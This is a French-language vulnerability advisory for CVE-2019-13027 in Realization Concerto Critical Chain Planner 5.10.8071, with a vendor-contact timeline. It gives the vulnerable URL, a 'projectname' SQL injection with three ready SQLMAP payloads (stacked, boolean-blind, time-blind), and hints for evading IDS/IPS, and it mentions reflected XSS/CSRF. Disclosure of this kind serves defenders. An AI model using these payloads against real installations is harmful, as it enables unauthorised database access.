
Détails pour divulguer CVE-2019-13027
Détails pour la divulgation de CVE-2019-13027
Chronologie des contacts avec le fournisseur : 1er juillet 2019 -> Pas de réponse, pas de retour par e-mail.
4 juillet 2019 -> Pas de réponse, pas de retour par e-mail.
8 juillet 2019 -> E-mail envoyé, Github créé.
11 juillet 2019 -> Pas de réponse du fournisseur. Vulnérabilité divulguée.
[Type de vulnérabilité] SQL Injection [Code de base du produit affecté] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Version: 5.10.8071 (Les autres versions de la branche 5.x sont probablement affectées. Impossible de tester avec d'autres branches)
[Composant affecté] Realization Concerto Critical Chain Planner (alias CCPM) 5.10.8071 présente plusieurs problèmes de sécurité critiques, notamment une injection SQL dans au moins la page web taskupdt/taskdetails.aspx via le paramètre 'projectname'
[Type d'attaque] Remote
[Vecteurs d'attaque] L'application présente de nombreux XSS/CSRF réfléchis (par exemple, dans checklist/checklist), mais le plus délicat est l'injection SQL. Une certaine manipulation est nécessaire selon la version de SQL Server et/ou l'IDS/IPS.
URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
ProjectName (foo) doit exister et être valide. Fuzz les autres paramètres (ou utilisez une vraie requête). foo a aussi un XSS
SQL détecté (payloads provenant de SQLMAP) Paramètre : projectname (GET)
Type : requêtes empilées Titre : Microsoft SQL Server/Sybase stacked queries (comment) Payload : projectname=foo';WAITFOR DELAY '0:0:5'-- Type : aveugle basé sur des booléens Titre : AND boolean-based blind - WHERE or HAVING clause Payload : projectname=foo' AND 3676=3676-- Type : aveugle basé sur le temps Titre : Microsoft SQL Server/Sybase time-based blind (IF) Payload : projectname=foo' WAITFOR DELAY '0:0:5'--
[Fournisseur du produit] REALIZATION - https://www.realization.com/